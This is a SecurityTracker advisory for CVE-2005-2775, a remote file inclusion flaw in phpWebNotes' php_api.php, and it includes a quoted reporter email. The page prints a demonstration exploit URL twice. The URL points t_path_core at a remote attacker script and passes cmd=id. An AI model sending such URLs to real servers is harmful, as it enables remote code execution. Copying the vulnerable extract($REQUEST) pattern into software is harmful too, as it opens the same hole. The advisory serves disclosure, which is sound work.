SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   phpWebNotes Vendors:   webnotes.sourceforge.net
phpWebNotes Include File Error in 'php_api.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014807
SecurityTracker URL:  http://securitytracker.com/id/1014807
CVE Reference:   CVE-2005-2775   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 29 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0.0-pr1
Description:   A vulnerability was reported in phpWebNotes. A remote user can execute arbitrary commands on the target system.

The 'php_api.php' script does not properly validate user-supplied input in the 't_path_core' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/xxxxx/api.php?t_path_core=http://pathtohackingscript?&cmd=id

Norbert reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  sourceforge.net/projects/webnotes/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  XSS security hole in phpwebnotes.

Hi security team!

I have found a security hole in a popular php application (not
maintained anymore). The hole already gets exploited - our server was 
hacked that way two days ago. Probably hackers just use google to find 
installations of phpwebnotes.

Version: phpWebNotes-2.0.0-pr1.tar.gz (last)
----------------------------------------------------------------------

the bug is in php_api.php line 77:

extract($REQUEST);

this allowes to change $t_path_core which is used in api.php:

require_once( $t_path_core . 'constants_inc.php' );

this can be used for a cross site scripting attack.

how does it work:

GET
http://server/xxxxx/api.php?t_path_core=http://pathtohackingscript?&cmd=id

-----------------------------------------------------------------------


http://www.futureware.biz/webnotes/

http://sourceforge.net/projects/webnotes/

regards,

Norbert


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC